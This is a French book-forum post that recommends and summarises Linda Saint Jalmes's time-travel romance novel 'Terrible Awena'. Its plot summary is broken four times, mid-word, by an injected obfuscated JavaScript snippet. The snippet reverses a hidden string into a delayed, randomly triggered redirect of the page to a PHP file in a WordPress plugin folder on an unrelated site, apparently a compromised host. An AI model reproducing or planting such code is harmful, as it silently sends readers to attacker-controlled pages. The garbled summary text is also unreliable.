Terrible Awena - Linda Saint Jalmes

Pour discuter de vos livres favoris
Répondre
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Terrible Awena - Linda Saint Jalmes

Message par yami627 »

Décidément, je suis la seule à lire ici ? XD

Donc, voici un livre d'une auteure française que j'aime beaucoup. Elle a déjà écrit le tome 2 mais bon commençons par le 1 lol
Image

Résumé :
Awena Dano est une jeune fille des temps modernes de 21 ans, vivant encore chez sa mère, Marlène, totalement insensible à son égard. La jeune femme ne rêve que de prendre le large et se jure de tout faire pour que cela se fasse rapidement.
Mais un jour, alors que Marlène vient de se remarier pour la quatrième fois, Awena se voit offrir malgré elle, en cadeau d'anniversaire, un voyage dans le nord des Highl$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands, loin... assez, pour que Marlène puisse se débarrasser d'elle un temps.
À peine arrivée, accueillie dans un manoir lugubre par une vieille tante par alliance, la jeune femme fuit et se réfugie sur le haut d'une colline proche, où trône un ancien cercle de dolmens. Tout bascule, qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and elle se fait happer par une courbe du temps et se retrouve quelques six cent dix-huit ans dans le passé. Comment ne pas devenir folle, en faisant la connaissance de deux guerriers druides, Ned et Clyde, qui la livrent en patûre à leur laird, Darren Saint Clare alias le Loup Noir des Highl$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands... ?
Alors que Darren, lui, croit voir en elle sa promise, l'élue que les Dieux du monde des
Sidhe avaient annoncée, par le biais d'une très ancienne prophétie...

Un voyage dans le temps, un voyage dans les Higl$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands, de notre époque au moyen-âge, un choc des cultures, où le druidisme et la magie sont omniprésents.
Dans tout cela, l'histoire romanesque d'une jeune femme, qui découvrira qu'elle n'est pas celle, qu'elle croyait être...


perso j'ai adoré ce livre !!! j'ai jonglé entre fou rire et frayeur durant tous le long du récits (mon chéri me prenait pour une folle a rire toute seule mdr) et je ne vous parle pas des scènes d'amour Image (nous sommes tous des adultes :P )
Image
Répondre